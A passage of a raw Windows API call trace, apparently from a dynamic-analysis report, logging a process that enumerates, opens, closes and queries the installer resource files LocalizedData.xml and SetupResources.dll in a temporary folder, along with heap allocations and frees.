ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0060.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0060.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0060.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0060.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0060.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0060.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.504] AreFileApisANSI () returned 1 [0060.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0060.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.504] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0060.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0060.504] AreFileApisANSI () returned 1 [0060.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x719c8 [0060.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 45 [0060.505] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.505] GetFileType (hFile=0x424) returned 0x1 [0060.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0060.505] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.505] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.505] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.505] CloseHandle (hObject=0x424) returned 1 [0060.506] AreFileApisANSI () returned 1 [0060.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0060.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 45 [0060.506] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.506] GetFileType (hFile=0x424) returned 0x1 [0060.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0060.506] CloseHandle (hObject=0x424) returned 1 [0060.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0060.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0060.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0060.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0060.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0060.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0060.507] AreFileApisANSI () returned 1 [0060.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71bd0 [0060.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1b8, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 45 [0060.507] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4)) returned 1 [0060.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0060.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.507] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.507] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0060.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0060.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0060.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0060.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0060.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0060.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0060.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0060.508] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.508] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.508] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.508] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.508] AreFileApisANSI () returned 1 [0060.508] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1030\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1030\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0060.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.508] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.508] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0060.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0060.509] AreFileApisANSI () returned 1 [0060.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71620 [0060.509] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 46 [0060.509] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.513] GetFileType (hFile=0x424) returned 0x1 [0060.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0060.513] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.513] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.514] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.514] CloseHandle (hObject=0x424) returned 1 [0060.514] AreFileApisANSI () returned 1 [0060.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0060.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 46 [0060.514] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0060.514] GetFileType (hFile=0x424) returned 0x1 [0060.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0060.514] CloseHandle (hObject=0x424) returned 1 [0060.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0060.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0060.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0060.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0060.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0060.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0060.515] AreFileApisANSI () returned 1 [0060.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0060.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df88, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 46 [0060.515] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758)) returned 1 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.516] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x45f70, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䝘")) returned 0 [0060.516] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0060.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.516] HeapFree (in: hHeap=0x20000, 